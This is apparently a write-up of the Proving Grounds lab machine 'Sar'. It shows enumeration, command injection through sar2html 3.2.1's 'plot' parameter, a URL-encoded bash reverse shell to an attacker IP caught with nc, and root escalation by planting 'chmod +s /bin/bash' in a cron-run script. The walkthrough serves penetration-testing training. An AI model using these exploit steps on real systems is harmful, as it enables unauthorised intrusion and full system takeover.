Sar - OSPG
Summary Of Result
The machine is compromised by exploiting the vulnerable version of sar2html. Once we’ve obtained the initial access, we can then escalate our privilege via a root ‘s crontab that executes a custom .sh of our control.
Enumeration
Nmap
We will start our scan with nmap.
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 33:40:be:13:cf:51:7d:d6:a5:9c:64:c8:13:e5:f2:9f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHy/WJJHLFdbwbJpTyRYhEyj2jZV024UPWIdXfNHxq45uh08jkihv3znZ98caLP/pz352c0ZYD31We0bTSbHyjQce2bSAJHubDYp13hU/P4tbV5GIJ72W2rWkLTslH/SJoHUSqlManB7ZzgVyU2KQ4fnNx/V1XGJYsshquRqTrXKeeal+yQvTC4gnsr8ENIGMq0yJnYxMAasx6kmSc+S+065Mie65xkyisFXo2MQyxzsFdCu2w1bYmb3pegYDm6Y0c/EJP0sxDizXVwkUOS0XSVdGuk3RUYjt5GQ2fL24ZsML6CwN+HD2ZTnD0FK90PQTLuvlp6BoI/ZWvIenNvu63
| 256 8a:4e:ab:0b:de:e3:69:40:50:98:98:58:32:8f:71:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgxutbLnN4K2tj6ZHzrlzTKS+RRuly+RkA0J63JsQFiwyvz4PqA64w/h0Se3gymZV6zJ9XBpS41b6IoEymeiSA=
| 256 e6:2f:55:1c:db:d0:bb:46:92:80:dd:5f:8e:a3:0a:41 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM+5254x35Vwa2S7X73YLY87Q58qQOD9oQeSKMpmmT0o
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
There are only two services running on the target: SSH and HTTP.
Ffuf
ffuf is used to discover hidden directories of a web application. We can start ffuf by giving it a -u flag for URL and a -w flag for wordlist. The comprehensive command will look like:
$ ffuf -u http://192.168.123.35/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
...
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
phpinfo.php [Status: 200, Size: 95515, Words: 4725, Lines: 1170]
robots.txt [Status: 200, Size: 9, Words: 1, Lines: 2]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10]
Lets us navigate to the /robots.txt directory we’ve obtained previously.
$ curl -s 192.168.123.35/robots.txt | html2text
sar2HTML
robots.txt yields sar2HTML.
Opening sar2HTML, we are redirected to a new directory.
$ curl -s 192.168.123.35/sar2HTML/index.php | html2text
sar2html Ver 3.2.1
(Donate if you like!)
* New
* OS
o HP-UX
o Linux
o SunOS
→ The target system is running sar2html version 3.2.1.
After conducting a few investigations, we discover that 3.2.1 is a vulnerable version of sar2html, which could lead to Remote Code Execution (RCE).
$ searchsploit sar2html
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
sar2html 3.2.1 - 'plot' Remote Code Execution | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution | php/webapps/47204.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Exploitation
Sar2HTML plot Vulnerability
By exploiting the vulnerable plot param, we easily achieve code execution.
There are two ways of achieving code execution.
[1.] Manual with the following payload:
http://192.168.123.35/sar2HTML/index.php?plot=<OS>;<command-here>
and curl
$ curl -s 192.168.123.35/sar2HTML/index.php?plot=LINUX%3Bwhoami | html2text
[...]
..>There is no defined host...
www-data
[2.] Using the public exploit script.
$ python3 49344.py
Enter The url => http://192.168.123.35/sar2HTML/
Command => whoami
www-data
Command => id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
It’s always a good idea to URL-encode the reverse shell before sending it. Our final payload is:
bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.49.123%2F80+0%3E%261%22
If everything works properly, our nc should catch the reverse shell at port 80 as www-data.
$ nc -nlvp 80 1 ⨯
listening on [any] 80 ...
connect to [192.168.49.123] from (UNKNOWN) [192.168.123.35] 43594
bash: cannot set terminal process group (981): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Privilege Escalation
Crontab
There is a cronjob running on the target system by root.
www-data@sar:/var/www/html/sar2HTML$ cat /etc/crontab
cat /etc/crontab
...
#
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
→ Every 5 minutes, root will navigate to the directory /var/www/html and execute ./finally.sh.
Let’s us inspect the file ./finally.sh:
www-data@sar:/var/www/html/sar2HTML$ cat /var/www/html/./finally.sh
cat /var/www/html/./finally.sh
#!/bin/sh
./write.sh
The file ./finally.sh will then execute ./write.sh, which is under our control.
www-data@sar:/var/www/html/sar2HTML$ ls -al /var/www/html/write.sh
ls -al /var/www/html/write.sh
-rwxrwxrwx 1 www-data www-data 30 Jul 24 2020 /var/www/html/write.sh
Essentially, we can just craft a payload and write it into the /var/www/html/write.sh, then wait for 5 minutes, our payload should be executed by root.
The payload might look like follow:
www-data@sar:/var/www/html/sar2HTML$ cat /var/www/html/write.sh
chmod +s /bin/bash
After 5 minutes, /bin/bash should be dressed with a SUID bit.
www-data@sar:/var/www/html/sar2HTML$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-sr-x 1 root root 1113504 Jun 7 2019 /bin/bash
This also means we are root on the system!.
www-data@sar:/var/www/html/sar2HTML$ bash -p
bash -p
whoami
root